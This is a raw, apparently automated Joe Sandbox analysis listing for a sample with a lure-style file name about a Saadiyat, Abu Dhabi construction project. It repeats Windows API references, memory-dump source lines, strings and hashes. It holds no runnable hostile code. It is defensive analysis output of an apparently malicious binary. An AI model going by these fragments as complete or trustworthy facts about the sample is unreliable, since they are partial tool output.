                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: PathTemp$free
                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040FDD5
                                                                                                                            • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                          • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                          • API String ID: 1775345501-2769808009
                                                                                                                          • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                          • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                          • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                                                                                          • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                          APIs
                                                                                                                          • wcscpy.MSVCRT ref: 0041477F
                                                                                                                          • wcscpy.MSVCRT ref: 0041479A
                                                                                                                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                          • String ID: General
                                                                                                                          • API String ID: 999786162-26480598
                                                                                                                          • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                          • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                                                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                          APIs
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                          • _snwprintf.MSVCRT ref: 0040977D
                                                                                                                          • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                          • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                          • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                          • API String ID: 0-1953309616
                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                          • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                          • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2241099983-0
                                                                                                                          • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                          • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4053608372-0
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4247780290-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1471605966-0
                                                                                                                          APIs
                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                                                                                          • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MetricsSystem$PlacementWindow
                                                                                                                          • String ID: AE
                                                                                                                          • API String ID: 3548547718-685266089
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: _memicmpwcslen
                                                                                                                          • String ID: @@@@$History
                                                                                                                          • API String ID: 1872909662-685208920
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                          • String ID: </%s>
                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040E770
                                                                                                                          • SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040E79F
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSendmemset
                                                                                                                          • String ID: AE$"
                                                                                                                          • API String ID: 568519121-1989281832
                                                                                                                          • Opcode ID: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                          • Opcode Fuzzy Hash: b8b737cf360229c8c3c0ba8ae205d700f5cbc6e636b32f375fd4ccd57fc75389
                                                                                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                          • Opcode ID: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                          • Opcode Fuzzy Hash: 0d93d59d75102ca4f37fb867a54fcac0e05f73641c093ad9b23abec7f1ae8059
                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
